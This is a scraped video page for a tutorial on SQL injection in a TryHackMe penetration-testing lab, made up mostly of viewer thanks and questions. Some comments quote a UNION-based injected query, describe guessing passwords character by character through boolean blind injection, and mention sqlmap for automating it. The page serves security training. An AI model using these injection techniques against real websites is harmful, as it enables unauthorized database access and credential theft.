SQL Injection Vulnerability Explained | TryHackMe Junior Penetration Tester

SQL Injection Vulnerability Explained | TryHackMe Junior Penetration Tester | OSCP

Рет қаралды 32,226

Motasem Hamdan | Cyber Security & Tech

Күн бұрын

Пікірлер

@gmoguel69 3 жыл бұрын

The best expaination for SQL Injection that I've ever heard, I never understood until I watched this video, thank you.

@peepers46 3 жыл бұрын

This was one of the best explanations of SQL injection I've seen Thank you

@Jebly_5555 Жыл бұрын

Very VERY helpful. I don't totally know all the SQL formatting and arguments and stuff yet, so it helps to have it explained. It was even better once you started explaining beyond the task because it helped reinforce the points the tasks made.

@NicolasCramer-z2t Жыл бұрын

once again mr. Motasem to help me not lose more time banging my head against the wall, thanks!

@iCyberVenom 2 жыл бұрын

Great explanation. Best to increment by one for each letter/number when "guessing" database/table/username/password instead of randomly hopping between letters and numbers. Then again...a script could automate this entire process, so it's interesting this SQL injection task never mentions it. It leaves learners with the impression they'll have to memorize these manual tests.

@alexandrabeekers3747 2 жыл бұрын

Totally agree with previous comments. Thank you for this excellent explanation, couldn't have done it without it.

@aroxander Жыл бұрын

very nice video, I was very confused on the wording at level 4 so seeing how you were doing it made it click in my head

@sharky9493 2 жыл бұрын

I struggle in task 8.....thanks for the help!!

@TYLONsRoar 8 ай бұрын

Thank you Kind Sir. Now all I have to do is watch👏 cram👏 and repeat.👏

@fmoney 2 жыл бұрын

At 18:53 did you copy the single apostrophe before the OR? It’s not working for me and I need to spend more time to understand it worked but I don’t understand what I was doing wrong. On a better note I figured out the password started with a three as soon as you said numbers I tried 1 2 then 3 and got a true response on the level three question

@MotasemHamdan 2 жыл бұрын

Yes I did. If it didn't work with single one, try it with double.

@fmoney 2 жыл бұрын

@@MotasemHamdan I tried with double I was copying with the single apostrophe every time but it only worked once. I’m having fun though.

@hequinteros 2 жыл бұрын

The best explanation I have seen for SQL Injection, specially about the task #8 😊

@TheSpecialist54 2 жыл бұрын

I find your channel very informative thanks bro.

@extremoleste8310 2 жыл бұрын

Friend I really like your classes, please make more videos of hard level machines

@francesa5096 2 жыл бұрын

Thanks a lot for the detailed explanation. This is so beautiful

@silentkille4 2 жыл бұрын

great explanation love your content

@mongodb7832 2 жыл бұрын

Great video, will be watching more.

@tonyYoutube2 9 ай бұрын

Merci pour tes explications

@vimalan_sb 2 жыл бұрын

At 23:25, Can you please explain how the SQL query -> "SELECT * FROM users where username = 'user' UNION SELECT 1, 2, 3;" changed the value from {"taken" : false} to {"taken" : true} even though the username : 'user' is not present in the database ??

@missx0 2 жыл бұрын

I have the same doubt.

@vimalan_sb 2 жыл бұрын

@@missx0 The where condition username = 'user' will never be true because there is no such username in the database. Assume that the users table has 5 columns, when we use ' UNION SELECT 1,2,3,4,5 ' a dummy row with 5 columns will be returned. Since a row with 5 columns ( Similar to that of users table) is returned the application logic assumes that the where condition became true and users table row is fetched.

@iSgapetti Жыл бұрын

@@vimalan_sb I think it's just like in 7:36, where the id must be changed from 1 (a valid one) to a 0 (invalid one). TryHackMe's explanation is: The article is being displayed because it takes the first returned result somewhere in the web site's code and shows that. To get around that, we need the first query to produce no results. This can simply be done by changing the article id from 1 to 0. So I'm guessing that if the first part of the UNION statement will somehow be disregarded if it is invalid or produces no results.

@arunakumbar-bs6ne Жыл бұрын

Well explained thank you🥳

@unclehoop3554 2 жыл бұрын

so at 35:56, you just keep enumerating all the numbers and letters as long as it returns true? Is that how you get the number 38?

@unclehoop3554 2 жыл бұрын

I think I get the answer from you at 42:45. Thank you for making this video!

@sufij 3 жыл бұрын

Hey brother! Can you please cover the CSS room! Been stuck on the last challenge for a couple days and cannot figure out what exactly im doing wrong. Apparently there is an automated component which appears to be complicating things a bit.

@GuyFawkes1 6 ай бұрын

What is the purpose of union, from what I understood it is used to select data from multiple tables, I am banging my head against the wall understanding this part union select 1, union select 1,2,3

@chocolate9111 3 жыл бұрын

Need Hip Flask walk-through!

@WarThunderista 8 ай бұрын

Guys I suggest you to bang your head first and see this video after you complete it on your own to confirm your knowledge. This way you are going to understand everything much better.

@aht_root7133 2 жыл бұрын

Thanks broo

@davidb9323 3 жыл бұрын

Can you increase your audio volume ?

@mridontclickbaitftw4366 2 жыл бұрын

Im kind of confused how you got 3845 on the boolean based injection....

@Blu3yyy Жыл бұрын

Thank you!

@alveek 9 ай бұрын

thanks, man

@huuloc8719 3 жыл бұрын

Thank you so much bro

@firecasts Жыл бұрын

Like jesus christ age 33rd comment to thank you a lot. I was trying in the third part. Monitoring everything I tried to mix something, but the hint were not so nice.

@kezzle9609 2 жыл бұрын

This isn't much of an explanation, like why you changed the id to a zero

@NoName1412 3 жыл бұрын

i want to ask , what if we dont know the length of the password or username?, thank you.

@MotasemHamdan 3 жыл бұрын

You need to keep trying by incrementing the characters until you are able to guess the complete password. In an automated fashion, sqlmap would do this for you.